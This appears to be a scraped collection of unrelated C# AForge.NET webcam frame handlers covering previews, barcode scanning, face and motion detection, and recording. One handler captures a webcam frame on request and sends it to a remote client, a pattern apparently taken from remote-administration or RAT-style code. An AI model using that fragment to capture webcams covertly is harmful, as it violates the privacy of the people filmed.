void videoSource_NewFrame(object sender, NewFrameEventArgs eventArgs) { lock (s) { this.pictureBox1.Image = (Image)eventArgs.Frame.Clone(); } }
private void cam_NewFram(object sender, NewFrameEventArgs eventArgs) { Bitmap bit = (Bitmap)eventArgs.Frame.Clone(); pictureBoxPic.Image = bit; //throw new NotImplementedException(); }
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { //Cast the frame as Bitmap object and don't forget to use ".Clone()" otherwise //you'll probably get access violation exceptions if (start) { pictureBoxVideo.BackgroundImage = (Bitmap)eventArgs.Frame.Clone(); var img = (Bitmap)eventArgs.Frame.Clone(); byte[] byteArray = null; count--; if (count < 0) { count = 20; using (MemoryStream stream = new MemoryStream()) { img.Save(stream, System.Drawing.Imaging.ImageFormat.Png); stream.Close(); byteArray = stream.ToArray(); } var res = EMO.getEmo(byteArray); if (res.Length > 10) { dynamic data = JsonConvert.DeserializeObject(res); lat = "" + data[0].scores.anger; lht = "" + data[0].scores.happiness; lnt = "" + data[0].scores.neutral; lst = "" + data[0].scores.sadness; lct = "" + data[0].scores.contempt; lft = "" + data[0].scores.fear; if (lat.Contains("E")) { lat = "000"; } if (lht.Contains("E")) { lht = "000"; } if (lnt.Contains("E")) { lnt = "000"; } if (lst.Contains("E")) { lst = "000"; } if (lct.Contains("E")) { lct = "000"; } if (lft.Contains("E")) { lft = "000"; } } } } }
void cam_NewFrame(object sender, NewFrameEventArgs eventArgs) { //Evento em que mostra o frame no picture box Bitmap bit = (Bitmap)eventArgs.Frame.Clone(); pbCamera.Image = bit; }
//------------------------------------------------------------------------------------------------------------------------ private void OnNewFrame(object sender, NewFrameEventArgs eventArgs) { // get new frame Bitmap bitmap = eventArgs.Frame; if (IsActive) OnFrameCaptured(this, new VideoEventArgs(bitmap)); }
void captureDevice_NewFrame(object sender, NewFrameEventArgs eventArgs) { using (UnmanagedImage uimage = UnmanagedImage.FromManagedImage(eventArgs.Frame)) { try { using (Bitmap image = uimage.ToManagedImage()) { IntPtr hBitMap = image.GetHbitmap(); try { BitmapSource bmaps = Imaging.CreateBitmapSourceFromHBitmap(hBitMap, IntPtr.Zero, Int32Rect.Empty, BitmapSizeOptions.FromEmptyOptions()); bmaps.Freeze(); Dispatcher.Invoke((Action)(() => { pictureBoxMain.Source = bmaps; }), DispatcherPriority.Render, null); process.NewBitmap(image); } finally { DeleteObject(hBitMap); } } } catch (Exception ex) { ex.ToString(); } } }
void controller_NewFrame(object sender, NewFrameEventArgs eventArgs) { if (!backproj) { Bitmap image = eventArgs.Frame; if (image == null) return; if (parent.faceForm != null && !parent.faceForm.IsDisposed) { MatchingTracker matching = parent.faceForm.faceController.Tracker as MatchingTracker; Rectangle rect = new Rectangle( matching.TrackingObject.Center.X, 0, image.Width - matching.TrackingObject.Center.X, matching.TrackingObject.Center.Y); rect.Intersect(new Rectangle(0, 0, image.Width, image.Height)); marker.Rectangles = new[] { matching.TrackingObject.Rectangle }; image = marker.Apply(image); } pictureBox.Image = image; } }
void NewFrame(object sender, NewFrameEventArgs eventArgs) { Bitmap bmp = eventArgs.Frame; int index = Array.IndexOf(camIds, ((VideoCaptureDevice)sender).Source); switch ( index ) { case 0: Dispatcher.Invoke(() => cam1Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; case 1: Dispatcher.Invoke(() => cam2Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; case 2: Dispatcher.Invoke(() => cam3Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; case 3: Dispatcher.Invoke(() => cam4Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; case 4: Dispatcher.Invoke(() => cam5Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; case 5: Dispatcher.Invoke(() => cam6Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; case 6: Dispatcher.Invoke(() => cam7Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; case 7: Dispatcher.Invoke(() => cam8Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; case 8: Dispatcher.Invoke(() => cam9Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break; } }
private void video_NewFrame(object sender, NewFrameEventArgs eventArgs) { // get new frame Bitmap bitmap = eventArgs.Frame; Bitmap imediateDraw = new Bitmap(bitmap, new Size(pictureBox2.Width, pictureBox2.Height)); pictureBox2.Invoke((Action)delegate() { if (pictureBox2.Image != null) { pictureBox2.Image.Dispose(); } pictureBox2.Image = imediateDraw; }); Bitmap clone = new Bitmap(bitmap.Width, bitmap.Height, System.Drawing.Imaging.PixelFormat.Format24bppRgb); using (Graphics gr = Graphics.FromImage(clone)) { gr.DrawImage(bitmap, new Point(0, 0)); } processor.Image = clone; bitmap.Dispose(); }
private void _videoCaptureDevice_NewFrame(object sender, NewFrameEventArgs eventArgs) { Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone(); CameraFrameEventArgs args = new CameraFrameEventArgs(bitmap); OnCameraFrame(args); bitmap.Dispose(); }
private void video_NewFrame(object sender, NewFrameEventArgs eventArgs) { // get new frame pictureBox1.Image = (Bitmap)eventArgs.Frame.Clone(); // process the frame }
void FinalVideo_NewFrame(object sender, NewFrameEventArgs eventArgs) { Icon newIcon = new Icon(@"c:\users\gregster\documents\visual studio 2012\Projects\WebCamTrack\WebCamTrack\bin\Debug\favicon.ico"); BlobCounter bc = new BlobCounter(); EuclideanColorFiltering filter = new EuclideanColorFiltering(); Bitmap video = (Bitmap)eventArgs.Frame.Clone();//sem filtro Bitmap video1 = (Bitmap)eventArgs.Frame.Clone();// imagem com filtro // filter.CenterColor = new RGB(0, 0, 0); filter.Radius = 100; filter.ApplyInPlace(video1);//aplicando o filtro bc.MinWidth = 5; bc.MinHeight = 5; bc.FilterBlobs = true; // bc.ObjectsOrder = ObjectsOrder.Size; bc.ProcessImage(video1);// processando a imagem que ja foi filtrada para identificar objetos Rectangle[] rects = bc.GetObjectsRectangles(); foreach (Rectangle recs in rects) if (rects.Length > 0) { Rectangle objectRect = rects[0]; Graphics g = Graphics.FromImage(video);//identificar objetos a partir da imagem com filtro Graphics h = Graphics.FromImage(video1); using (Pen pen = new Pen(Color.FromArgb(160, 255, 160), 5)) { g.DrawIcon(newIcon, objectRect); // g.DrawRectangle(pen, objectRect); h.DrawRectangle(pen, objectRect); } g.Dispose(); h.Dispose(); } pictureBox1.Image = video; pictureBox2.Image = video1; }
//Handler for event NewFrame in videoCaptureDevice private void VideoCaptureDevice_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { if (_reader.ActivateBool) { //Gets the image from eventArgs Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone(); //scan for barcode in image string barcode = _reader.GetBarcode(bitmap); //If a barcode was found if (barcode != null) { BarcodeFound(new BarcodeFoundEventArgs { Barcode = barcode }); _reader.Deactivate(); _timer.Enable(); } //invoke new action on main thread, because camera uses it own thread Application.Current.Dispatcher.BeginInvoke(new Action(() => { CameraFeed = Convert(bitmap); })); Application.Current.Dispatcher.BeginInvoke(new Action(() => { CameraFeed.Freeze(); })); } }
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { try { BitmapImage bi; using (var bitmap = (Bitmap)eventArgs.Frame.Clone()) { bi = bitmap.ToBitmapImage(); if (snap) { //settingn folder for pulling up image already saved (in assests folder) var imagePath = System.IO.Path.Combine(root, "../../Evaluated/"); string cameraPic = imagePath + "evaluated.jpg"; bitmap.Save(cameraPic); snap = false; } } bi.Freeze(); // avoid cross thread operations and prevents leaks Dispatcher.BeginInvoke(new ThreadStart(delegate { videoPlayer.Source = bi; })); } catch (Exception exc) { MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error); StopCamera(); } }
void device_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap shoot = eventArgs.Frame.Clone() as Bitmap; try { frameCounter++; if (frameCounter > 10) { invoices = invoiceProcess.GetInvoiceCollection(shoot); frameCounter = 0; } if (invoices != null && invoices.Count > 0) { using (Graphics graph = Graphics.FromImage(shoot)) { foreach (Invoice invoice in invoices) { graph.DrawPolygon(pen, invoice.Corners); //Draw a polygon around card PointF point = invoiceProcess.GetStringPoint(invoice.Corners); //Find Top left corner point.Y += 10; graph.DrawString(invoice.Code == null ? "" : invoice.Code, font, Brushes.Lime, point); //Write string on card } } } //Draw Rectangle around cards and write card strings on card } catch (Exception ex) { File.AppendAllText("e:\\error.txt", ex.Message); throw; } pb_Cinema.Image = ResizeShoot(shoot); }
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { System.Drawing.Bitmap bmp = (System.Drawing.Bitmap)eventArgs.Frame.Clone(); string fullPath = g_Path + "temp\\"; if (!Directory.Exists(fullPath)) { Directory.CreateDirectory(fullPath); } // saved = saved++; string img = fullPath + "temp" + saved + ".jpeg"; //try // { Stream imageFileStream = File.Open(img, FileMode.OpenOrCreate, FileAccess.ReadWrite); bmp.Save(imageFileStream, System.Drawing.Imaging.ImageFormat.Jpeg); imageFileStream.Flush(); imageFileStream.Close(); imageFileStream.Dispose(); // } // catch (Exception) { ;} flag = true; imageFilePath = img; Console.WriteLine(imageFilePath); videoSource.NewFrame -= new NewFrameEventHandler(videoSource_NewFrame); }
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { try { BitmapImage bi; using (var frame = (Bitmap)eventArgs.Frame.Clone()) { var width = frame.Width; var height = frame.Height; // try overlay Bitmap bitmapResult = new Bitmap(width, height, frame.PixelFormat); Graphics g = Graphics.FromImage(bitmapResult); g.DrawImage(frame, 0, 0, width, height); // apply raster g.DrawImage(_raster, 0, 0, width, height); // apply logo //g.DrawImage(_logo, width - 175, 25, 150, 121); bi = bitmapResult.ToBitmapImage(); // TODO: Add frame to some output video stream } bi.Freeze(); // avoid cross thread operations and prevents leaks Dispatcher.BeginInvoke(new ThreadStart(delegate { imgPreview.Source = bi; })); } catch (Exception exc) { MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error); StopCamera(); } }
private void FinalVideoSource_NewFrame2(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap image = (Bitmap)eventArgs.Frame.Clone(); if (detector.ProcessFrame(image) > 1) { pictureBox1.Image = image; } pictureBox1.Image = image; int X = 0; int Y = 0; try { BlobCountingObjectsProcessing countingDetector = (BlobCountingObjectsProcessing)detector.MotionProcessingAlgorithm; foreach (Rectangle rect in countingDetector.ObjectRectangles) { X += rect.X; Y += rect.Y; } SumX = X / countingDetector.ObjectRectangles.Length; SumY = Y / countingDetector.ObjectRectangles.Length; } catch (Exception e) { Console.WriteLine(e.Message); } }
/// <summary> /// New frame handler. /// </summary> /// <param name="sender"></param> /// <param name="eventArgs"></param> private void videoDevice_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { lock (this.syncLockVideo) { // Dispose last frame. if (this.capturedImage != null) { this.capturedImage.Dispose(); this.capturedImage = null; } // Clone the resized content. if ((this.pbCamera.Size.Width > 1 && this.pbCamera.Size.Height > 1) && this.WindowState != FormWindowState.Minimized) { this.capturedImage = Utils.ResizeImage((Bitmap)eventArgs.Frame.Clone(), this.pbCamera.Size); } // Exit there is a problem with data cloning. if (this.capturedImage == null) { return; } this.ProcessImage(this.capturedImage); } }
private void videoNewFrame(object sender, NewFrameEventArgs args) { Bitmap temp = args.Frame.Clone() as Bitmap; try { frameCounter++; if (frameCounter > 10) { cards = recognizer.Recognize(temp); frameCounter = 0; } //Draw Rectangle around cards and write card strings on card using (Graphics graph = Graphics.FromImage(temp)) { foreach (Card card in cards) { graph.DrawPolygon(pen, card.Corners); //Draw a polygon around card PointF point = CardRecognizer.GetStringPoint(card.Corners); //Find Top left corner point.Y += 10; graph.DrawString(card.ToString(), font, Brushes.White, point); //Write string on card } } } catch { } this.pictureBox1.Image = ResizeBitmap(temp); }
void cam_NewFrame(object sender, NewFrameEventArgs eventArgs) { //pictureBox1.Image = (Bitmap)eventArgs.Frame.Clone(); Bitmap sourceImage = (Bitmap)eventArgs.Frame.Clone(); pictureBox1.Image = ApplyRGBFilter(sourceImage); //Applying filter and show in picture box }
void cam_NewFrame(object sender, NewFrameEventArgs eventArgs) { video1 = (Bitmap)eventArgs.Frame.Clone(); video2 = (Bitmap)eventArgs.Frame.Clone(); bool isChecked = radioButton1.Checked; if (isChecked) { trackBar3.Enabled = true; trackBar4.Enabled = true; trackBar5.Enabled = true; trackBar6.Enabled = true; trackBar7.Enabled = true; trackBar8.Enabled = true; Rgb_obj.ApplyRGB(video2, minR, maxR, minG, maxG, minB, maxB); // Apply Rgb Filter } else { FACE_DECTECTION.Face_Detection(video2); // Apply Face detection filter } grayScale_Image = gray_obj.Apply_grayscale(video2); // Apply GrayScale Filter Blob_Detection.blob_setter(video1 ,grayScale_Image, 10, 10); pictureBox1.Image = video2; pictureBox2.Image = video1; }
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { log.Debug("videoSource_NewFrame: Received a frame from the File video source"); lock (InstanceImageDispose) { // log.Debug("videoSource_NewFrame: Considering disposal of previous Images"); if (InstanceGray != null) { // log.Debug("videoSource_NewFrame: Disposing of previous Gray frame"); InstanceGray.Dispose(); InstanceGray = null; } else { // log.Debug("videoSource_NewFrame: No InstanceGray exists, no need to Dispose of it"); } } log.Debug("videoSource_NewFrame: Converting to a new Gray"); // InstanceGray = new Image<Gray, byte>((Bitmap)eventArgs.Frame.Clone()); InstanceGray = new Image <Gray, byte>((Bitmap)eventArgs.Frame); log.Debug("videoSource_NewFrame: Finished converting to a new Gray"); // notify about the new frame log.Debug("videoSource_NewFrame: Built Raising NewFrame event"); ImageEventArgs imageEventArgs = new ImageEventArgs(InstanceGray); OnRaiseCustomEvent(imageEventArgs); log.Debug("videoSource_NewFrame: Event complete"); }
//eventhandler if new frame is ready private void Video_NewFrame(object sender, NewFrameEventArgs eventArgs) { cameraImage = (Bitmap)eventArgs.Frame.Clone(); //do processing here }
private void mjpegSource_NewFrame(object sender, NewFrameEventArgs eventArgs) { ImageSource IS = (ImageSource)converter.Convert(eventArgs.Frame, null, null, null); IS.Freeze(); Dispatcher.BeginInvoke(new ThreadStart(delegate { videoImage.Source = IS; IS = null; })); }
private void Frame_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { try { ptxWebCam.Image = (Image)eventArgs.Frame.Clone(); } catch (Exception ex) { } }
private void webCam_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { pictureBox1.BackgroundImage = (Bitmap)eventArgs.Frame.Clone(); if (saveVideo != null) { saveVideo.AddFrame((Bitmap)eventArgs.Frame.Clone()); } }
private void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap newBmp; newBmp = (Bitmap)eventArgs.Frame; //recieve new frame from webcam and convert into Bitmap latestBmp = CopyBMP(newBmp); bitmapFlag = true; }
private void camNewFrame(object sender, NewFrameEventArgs args) { lock (imgLock) { currentFrame = (Bitmap)args.Frame.Clone(); imageAvailable = true; } }
private void NewFrameHandler(object sender, NewFrameEventArgs eventArgs) { Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone(); FastBitmap sobelBitmap = new FastBitmap(bitmap); FastBitmap fastBitmap = new FastBitmap(bitmap); Harries dummy = new Harries(); byte[] gray = fastBitmap.GrayPixels; var ps = dummy.Corner(gray, fastBitmap.Width, fastBitmap.Height); int r = 1; var size = new Size(r, r); foreach(Point p in ps) { using (Graphics g = Graphics.FromImage(bitmap)) { g.DrawRectangle(Pens.Coral, new System.Drawing.Rectangle(p, size)); } } //for (int i = 0; i < filters.Length; i++) //{ // filters[0].DoFilter(fastBitmap); //} //Parallel.For(0, fastBitmap.Width, i => // { // for (int j = 0; j < fastBitmap.Height; j++) // { // int difference = notModifiedBitmap[i, j] - fastBitmap[i, j]; // fastBitmap[i, j] = difference > 0 ? (byte)difference : (byte)0; // } // }); List<System.Drawing.Rectangle> result = detector.getElements(fastBitmap, 1, 1.25f, 0.1f, 2, defaultRect); foreach(System.Drawing.Rectangle rect in result) { System.Drawing.Rectangle nRect = rect; nRect.Height /= 2; List<System.Drawing.Rectangle> eyeResult = eyeDetector.getElements(fastBitmap, 1, 1.25f, 0.1f, 1, nRect); using (Graphics g = Graphics.FromImage(bitmap)) { if (eyeResult.Count > 1) { filters[1].DoFilter(sobelBitmap); SobelDetektor det = (SobelDetektor)filters[1]; g.DrawRectangles(Pens.Blue, eyeResult.ToArray()); foreach ( var eye in eyeResult) { System.Drawing.Rectangle pupil = searcher.FindPupil(sobelBitmap, eye, det.Angulars); g.DrawEllipse(Pens.Red, pupil); } } } }; using (Graphics g = Graphics.FromImage(bitmap)) { if (result.Count > 0) g.DrawRectangles(Pens.GreenYellow, result.ToArray()); } pictureBox1.Image = bitmap; }
void screenSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { //Cast the frame as Bitmap object and don't forget to use ".Clone()" otherwise //you'll probably get access violation exceptions Bitmap bm = (Bitmap)eventArgs.Frame.Clone(); Dispatcher.BeginInvoke(new UpdateUserScreenCallback(UpdateSceernSource), new object[] { bm }); }
void _device_NewFrame(object sender, NewFrameEventArgs eventArgs) { Bitmap bmp = eventArgs.Frame; FoundColorSpaces colorSpaces = ColorSpaceFinder.Find(bmp); FoundBlobs foundBlobs = BlobFinder.Find(colorSpaces, 80, 25, 90, 50, 1.2, 2.2); foreach(Blob blob in foundBlobs.Blobs) { Bitmap correctedBlobBitmap = ColorSpaceFinder.FindColorCorrectedForBlob(colorSpaces, blob); ColorTypeEnum color = ColorSpaceFinder.FindShapeColor(correctedBlobBitmap, _red, _green, _purple); System.Drawing.Pen pen = null; switch(color) { case ColorTypeEnum.Green: pen = new System.Drawing.Pen(System.Drawing.Brushes.Green, 5); break; case ColorTypeEnum.Red: pen = new System.Drawing.Pen(System.Drawing.Brushes.Red, 5); break; case ColorTypeEnum.Purple: pen = new System.Drawing.Pen(System.Drawing.Brushes.Purple, 5); break; case ColorTypeEnum.Unknown: pen = new System.Drawing.Pen(System.Drawing.Brushes.Yellow, 5); break; } using(Graphics g = Graphics.FromImage(bmp)) { g.DrawRectangle(pen, blob.Rectangle); } } BitmapData bmd = bmp.LockBits( new System.Drawing.Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadWrite, bmp.PixelFormat); byte[] bytes = new byte[bmd.Stride * bmd.Height]; Marshal.Copy(bmd.Scan0, bytes, 0, bytes.Length); Dispatcher.Invoke((Action)delegate() { if (_bmp == null) { _bmp = new WriteableBitmap(bmp.Width, bmp.Height, 96, 96, PixelFormats.Bgr24, null); VideoWindow.Source = _bmp; } _bmp.WritePixels(new Int32Rect(0, 0, bmp.Width, bmp.Height), bytes, bmd.Stride, 0); }); return; }
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap bmp = (Bitmap)eventArgs.Frame.Clone(); frame_rgb = new Image <Bgr, byte>(bmp); frame_rgb = GetStandandSize(frame_rgb); CvInvoke.cvFlip(frame_rgb.Ptr, IntPtr.Zero, FLIP.HORIZONTAL); DispatchImage.Instance.Dispath(frame_rgb.Copy()); }
void localSource_NewFrame(object sender, NewFrameEventArgs eventArgs) { byte[] jpegImage = Bitmap2JpegArray(eventArgs.Frame); Dispatcher.Invoke(() => primaryImageBox.Source = ByteImageConverter.ByteToImage(jpegImage)); string sizeString = "SIZE:" + jpegImage.Length + "Z"; byte[] startMessage = Encoding.ASCII.GetBytes(sizeString); clientSocket.Send(startMessage, startMessage.Length, SocketFlags.None); clientSocket.Send(jpegImage, jpegImage.Length, SocketFlags.None); }
private void VideoCaptureDevice_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone(); BarcodeReader reader = new BarcodeReader(); var result = reader.Decode(bitmap); if (result != null) { textBox1.Invoke(new MethodInvoker(delegate() { textBox1.Text = result.ToString(); })); SoundPlayer player = new SoundPlayer("Data\\scanner.wav"); player.Play(); if (result.ToString() == "4356-3964") { // Create a new string called 'arr' with a new string[4]. string[] arr = new string[4]; // Set the first one to the items combobox selected item then to string. arr[0] = "Strawberry Macaron"; // Set the second one to the price. arr[1] = "3"; // Set the third one to the quanity. arr[2] = "1"; // Set the last one to the total. arr[3] = "3"; // Create ListViewItem called 'lvi' and create a new ListViewItem with the 'arr' variable. ListViewItem lvi = new ListViewItem(arr); // Add the 'lvi' items to the list view. lvItems.Invoke(new MethodInvoker(delegate() { lvItems.Items.Add(lvi); })); // Make the sub total the sub total minus the total then to string. tbSubTotal.Invoke(new MethodInvoker(delegate() { tbSubTotal.Text = (Convert.ToInt32(tbSubTotal.Text) + Convert.ToInt32("3")).ToString(); })); } if (videoCaptureDevice != null) { if (videoCaptureDevice.IsRunning) { videoCaptureDevice.SignalToStop(); } } } pictureBox1.Image = bitmap; }
private void FinalFrame_NewFrame(object sender, NewFrameEventArgs eventArgs) { try { picVideo.Image = (Bitmap)eventArgs.Frame.Clone(); } catch (Exception ex) { MessageBox.Show(ex.Message); } }
private void newFrameEvent(object sender, NewFrameEventArgs eventArgs) { DateTime currentTime = DateTime.Now; Graphics graphics = Graphics.FromImage(eventArgs.Frame); TextRenderer.DrawText(graphics, currentTime.ToString("dd/mm/yyyy hh:mm:ss"), font, new Point(5, 5), Color.White, Color.Black); if (recorder != null) { recorder.AddFrame(eventArgs.Frame); } }
private void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs e) { double ellapsed = frameStopwatch.ElapsedMilliseconds; if (frameStopwatch.IsRunning) { lock (averageFramePeriod) averageFramePeriod.Enqueue(ellapsed); } frameStopwatch.Restart(); InvokeNewFrame(e.Frame); }
void _videoSource_NewFrame(object sender, NewFrameEventArgs eventArgs) { if (!_takePicture) return; if (eventArgs.Frame.Width == 0) { return; } _frame = eventArgs.Frame.Clone() as Bitmap; _videoSource.SignalToStop(); }
void novoFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { //Obtém o frame como BITMAP como um ".Clone()" if (bitmapsQueue.Count <= 5) { auxBitmap = (Bitmap)eventArgs.Frame.Clone(); bitmapsQueue.Add((Bitmap)eventArgs.Frame.Clone()); bitmapsCanUse.Add(true); queueCount++; } canUse = true; }
private void VideoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { if (eventArgs.Frame != null) { Bitmap bmp = (Bitmap)eventArgs.Frame.Clone(); Rectangle bmpRect = new Rectangle(0, 0, bmp.Width, bmp.Height); System.Drawing.Imaging.BitmapData bmpData = bmp.LockBits(bmpRect, System.Drawing.Imaging.ImageLockMode.ReadWrite, bmp.PixelFormat); AForge.Imaging.Drawing.Rectangle(bmpData, new Rectangle(10, 10, 100, 100), Color.Green); bmp.UnlockBits(bmpData); pictureBox1.Image = bmp; } }
/// <summary> /// Frame received callback /// </summary> /// <param name="sender"></param> /// <param name="eventArgs"></param> private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { try { BitmapImage bi; using (var bitmap = (Bitmap)eventArgs.Frame.Clone()) { // Here we choose what image to display if (ColorFiltered) { new EuclideanColorFiltering(new AForge.Imaging.RGB((byte)Red, (byte)Green, (byte)Blue), Radius).ApplyInPlace(bitmap); } if (Grayscaled) { using (var grayscaledBitmap = Grayscale.CommonAlgorithms.BT709.Apply(bitmap)) { bi = grayscaledBitmap.ToBitmapImage(); } } else if (Thresholded) { using (var grayscaledBitmap = Grayscale.CommonAlgorithms.BT709.Apply(bitmap)) using (var thresholdedBitmap = new Threshold(Threshold).Apply(grayscaledBitmap)) { if (Inverted) { new Invert().ApplyInPlace(thresholdedBitmap); } bi = thresholdedBitmap.ToBitmapImage(); } } else // original { var corners = FindCorners(bitmap); if (corners.Any()) { PaintCorners(corners, bitmap); } bi = bitmap.ToBitmapImage(); } } bi.Freeze(); // avoid cross thread operations and prevents leaks Dispatcher.BeginInvoke(new ThreadStart(delegate { videoPlayer.Source = bi; })); } catch (Exception exc) { MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error); StopCamera(); } }
private void OnNewFrame(object sender, NewFrameEventArgs eventArgs){ if (DrawCursor){ using (var g = Graphics.FromImage(eventArgs.Frame)) { Win32Declares.MouseCursor.CURSORINFO pci; pci.cbSize = Marshal.SizeOf(typeof(Win32Declares.MouseCursor.CURSORINFO)); if (Win32Declares.MouseCursor.GetCursorInfo(out pci)) { if (pci.flags == Win32Declares.MouseCursor.CURSOR_SHOWING) { Win32Declares.MouseCursor.DrawIcon(g.GetHdc(), pci.ptScreenPos.x, pci.ptScreenPos.y, pci.hCursor); g.ReleaseHdc(); } } } } }
private static void video_NewFrame(object sender, NewFrameEventArgs eventArgs) { // get new frame Bitmap bitmap = eventArgs.Frame; if (detector.ProcessFrame(bitmap) > 0.05) { imageCount++; string filename = "c:\\temp\\" + DateTime.UtcNow.ToFileTimeUtc() + ".png"; bitmap.Save(filename, ImageFormat.Png); Trace.WriteLine(string.Format("Image saved - {0}", imageCount)); } }
private void cam_NewFrame(object sender, NewFrameEventArgs eventArgs) { try { Bitmap bit = (Bitmap)eventArgs.Frame.Clone(); // get a copy of the BitMap from the VideoCaptureDevice if (!this.isResolutionSet) { // this is run once to set the resolution for the VideoRecorder this.imgWidth = bit.Width; this.imgHeight = bit.Height; this.isResolutionSet = true; } this.Display.Image = (Bitmap)bit.Clone(); // displays the current frame on the main form if ( !this.motionDetected) { // if motion detection is enabled and there werent any previous motion detected Bitmap bit2 = (Bitmap)bit.Clone(); // clone the bits from the current frame if (md.ProcessFrame(bit2) > 0.001) // feed the bits to the MD { if (this.calibrateAndResume > 3) { Thread th = new Thread(MotionReaction); th.Start(); // start the motion reaction thread } else this.calibrateAndResume++; } } if (IsRecording) { // if recording is enabled we enqueue the current frame to be encoded to a video file Graphics gr = Graphics.FromImage(bit); Pen p = new Pen(Color.Red); p.Width = 5.0f; using (Font myFont = new Font("Tahoma", 10, FontStyle.Bold)) { gr.DrawString(DateTime.Now.ToString(), myFont, Brushes.Red, new Point(2, 2)); } frames.Enqueue((Bitmap)bit.Clone()); } } catch (InvalidOperationException ex) { } }
private void Sec_Click(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap image = (Bitmap)eventArgs.Frame.Clone(); Bitmap image1 = (Bitmap)eventArgs.Frame.Clone(); pictureBox1.Image = image; Sec.Enabled = true; if (true) { AForge.Imaging.Filters.EuclideanColorFiltering filter = new AForge.Imaging.Filters.EuclideanColorFiltering(); filter.CenterColor = new AForge.Imaging.RGB(Color.FromArgb(215, 0, 0)); filter.Radius = 100; filter.ApplyInPlace(image1); nesnebul(image1); } }
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap bmp = (Bitmap)eventArgs.Frame.Clone(); string fullPath = path; if (!Directory.Exists(fullPath)) { Directory.CreateDirectory(fullPath); } string img = fullPath + DateTime.Now.ToString("yyyyMMdd hhmmss") + ".jpg"; images.Add(img); bmp.Save(img); //如果这里不写这个,一会儿会不停的拍照, videoSource.NewFrame -= new NewFrameEventHandler(videoSource_NewFrame); }
private static void FinalVideo_NewFrame(object sender, NewFrameEventArgs e) { if (!WebcamStarted) FinalVideo.Stop(); if (NeedsCapture) { var image = (Bitmap) e.Frame.Clone(); using (var stream = new MemoryStream()) { image.Save(stream, ImageFormat.Bmp); new GetWebcamResponse(stream.ToArray(), Webcam).Execute(Client); stream.Close(); } NeedsCapture = false; } }
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { //Cast the frame as Bitmap object and don't forget to use ".Clone()" otherwise //you'll probably get access violation exceptions //pictureBoxVideo.BackgroundImage = (Bitmap)eventArgs.Frame.Clone(); Bitmap barcodeBitmap = (Bitmap)eventArgs.Frame.Clone(); if (ExtractQRCodeMessageFromImage(barcodeBitmap) == "yJz1X") { if (!System.IO.File.Exists("C:\\Users\\joach\\OVERRIDE")) { approved = true; Exit(); } } }
private void newFrameEvent(object sender, NewFrameEventArgs eventArgs) { DateTime currentTime = DateTime.Now; fps = 1 / (currentTime - lastFrameDateTime).TotalSeconds; if (currentTime - startTime > TimeSpan.FromHours(2)) { recorder.Close(); startRecord(path,(int) fps ); } Graphics graphics = Graphics.FromImage(eventArgs.Frame); TextRenderer.DrawText(graphics, currentTime.ToString("dd/mm/yyyy HH:mm:ss"), font, new Point(5, 5), Color.White, Color.Black); if (recorder != null) { recorder.AddFrame(eventArgs.Frame); } }
private void video_NewFrame(object sender, NewFrameEventArgs eventArgs) { Cursor.Current = Cursors.WaitCursor; // get new frame bitmap = eventArgs.Frame; bitmap.Save(ConfigurationSettings.AppSettings["SaveImageLocation"]); StopVideo(videoSource); // process the frame byte[] data = File.ReadAllBytes(ConfigurationSettings.AppSettings["SaveImageLocation"]); // train the capture image FaceRecoginition.FaceRecognition.TrainAlbum(Name , emailID, data); Cursor.Current = Cursors.Default; }
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { try { BitmapImage bi; using (var bitmap = (Bitmap)eventArgs.Frame.Clone()) { bi = bitmap.ToBitmapImage(); } bi.Freeze(); // avoid cross thread operations and prevents leaks Dispatcher.BeginInvoke(new ThreadStart(delegate { imgMem.Source = bi; })); } catch (Exception exc) { MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error); StopCamera(); } }
